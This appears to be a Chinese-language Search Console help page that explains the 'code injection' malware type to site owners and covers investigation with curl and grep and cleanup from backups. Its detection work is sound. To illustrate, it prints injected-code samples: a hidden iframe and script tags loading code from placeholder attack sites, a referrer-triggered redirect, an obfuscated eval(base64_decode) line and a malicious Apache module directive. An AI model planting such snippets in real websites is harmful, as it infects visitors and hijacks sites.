恶意软件感染类型:代码注入

如果 Google Search Console 中有网页标记为“代码注入”这种恶意软件感染类型,这表示什么?

这表示您网站上的网页已被篡改并含有恶意代码,例如指向恶意软件攻击性网站的 iframe。

要了解关于恶意软件的更多常规信息,请参阅评估受破坏程度(遭恶意软件入侵)

如何调查“代码注入”恶意软件类型?

首先,避免使用浏览器来查看您网站上受感染的网页。因为恶意软件通常会利用浏览器漏洞进行传播,在浏览器中打开受感染的恶意软件网页可能会损害您的计算机。

不妨考虑通过使用 cURLWget 发起 HTTP 请求(例如,抓取网页)来确认相关行为。这些免费提供的工具有助于诊断重定向行为,而且您还可以灵活地在其中加入引荐来源网址或用户代理信息。通过只向使用特定用户代理或来自特定引荐来源网址的用户提供恶意内容,黑客可以将更多的“真实用户”作为目标,并可躲避网站所有者和恶意软件扫描工具的检测(您的网站必须处于在线状态才能使用这些工具)。

例如:

$curl -v --referer <referer-field> --user-agent "Mozilla/5.0 (
  Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" <your-url>
例如
$curl -v --referer "http://www.google.com" --user-agent "Mozilla/5.0 
  (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" http://www.example.com/page.html

接着,登录您的文件系统。对写入“代码注入”受感染网址的所有资源进行调查。以下列出了一些恶意代码注入示例:

  • 指向攻击性网站的 iframe
  • <iframe frameborder="0" height="0" src="http://<attack-site>/path/file" 
      style="display:none" width="0"></iframe>
  • 从攻击性网站调用并运行脚本的 JavaScript 或其他脚本语言
  • <script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>
  • 将浏览器重定向到攻击性网站的脚本
  • <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://malware-attack-site/");
      }
    </script>
  • 试图躲避检测的迷惑性恶意代码
  • eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • 旨在随机将有害代码写入其他无害脚本的共享对象文件
  • #httpd.conf modified by the hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

调查网站上可能存在的所有有害代码。搜索 [iframe] 字样可能有助于找出 iframe 代码。其他实用的关键字还包括“script”、“eval”和“unescape”。例如,在基于 Unix 的系统上:

$grep -irn "iframe" ./ | less

如何清理属于“代码注入”恶意软件类型的网站?

当您准备好清理网站(请参阅“针对被黑客入侵的网站的帮助”恢复流程中的第 7 步)后,可以将受影响的文件替换为最近的一个正常备份文件,也可以从各网页以及所有相关的脚本函数和文件中移除相应的代码注入内容。如果您修改了服务器配置文件,可能需要重新启动网络服务器才能使更改生效。

请注意,移除恶意代码并不能修复导致黑客在一开始入侵您网站的潜在漏洞。如果不解决根本问题,您的网站在将来还会再次被入侵。要详细了解如何清理整个网站(而不只是这种恶意软件类型),请参阅针对被黑客入侵的网站的帮助,尤其是第 5 步:评估受破坏程度(遭恶意软件入侵)中的“文件系统受破坏程度评估”。

该内容对您有帮助吗?
您有什么改进建议?